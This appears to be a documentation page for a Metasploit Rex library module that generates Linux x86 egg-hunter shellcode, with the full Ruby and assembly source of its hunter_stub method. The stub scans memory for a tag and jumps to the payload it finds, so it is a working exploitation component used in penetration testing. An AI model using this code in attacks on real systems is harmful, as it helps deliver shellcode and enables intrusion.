Module: Rex::Exploitation::Egghunter::Linux::X86
- Defined in:
- lib/rex/exploitation/egghunter.rb
Constant Summary collapse
- Alias =
Rex::Arch::ARCH_X86
Instance Method Summary collapse
-
#hunter_stub(payload, badchars = '', opts = {}) ⇒ Object
The egg hunter stub for linux/x86.
Instance Method Details
#hunter_stub(payload, badchars = '', opts = {}) ⇒ Object
The egg hunter stub for linux/x86.
258 259 260 261 262 263 264 265 266 267 268 269 270 271 272 273 274 275 276 277 278 279 280 281 282 283 284 285 286 287 288 289 290 291 292 293 294 295 296 297 298 299 300 301 302 303 304 305 306 307 308 309 310 311 |
# File 'lib/rex/exploitation/egghunter.rb', line 258 def hunter_stub(payload, badchars = '', opts = {}) startreg = opts[:startreg] raise RuntimeError, "Invalid egg string! Need #{esize} bytes." if opts[:eggtag].length != 4 marker = "0x%x" % opts[:eggtag].unpack('V').first checksum = checksum_stub(payload, badchars, opts) startstub = '' if startreg if startreg.downcase != 'ecx' startstub = "\n\tmov ecx,#{startreg}\n\tjmp next_addr" else startstub = "\n\tjmp next_addr" end end startstub << "\n\t" if startstub.length > 0 assembly = <<EOS cld #{startstub} check_readable: or cx,0xfff next_addr: inc ecx push 0x43 ; use 'sigaction' syscall pop eax int 0x80 cmp al,0xf2 je check_readable check_for_tag: ; check that the tag matches once mov eax,#{marker} mov edi,ecx scasd jne next_addr ; it must match a second time too scasd jne next_addr ; check the checksum if the feature is enabled #{checksum} ; jump to the payload jmp edi EOS assembled_code = Metasm::Shellcode.assemble(Metasm::Ia32.new, assembly).encode_string # return the stub assembled_code end |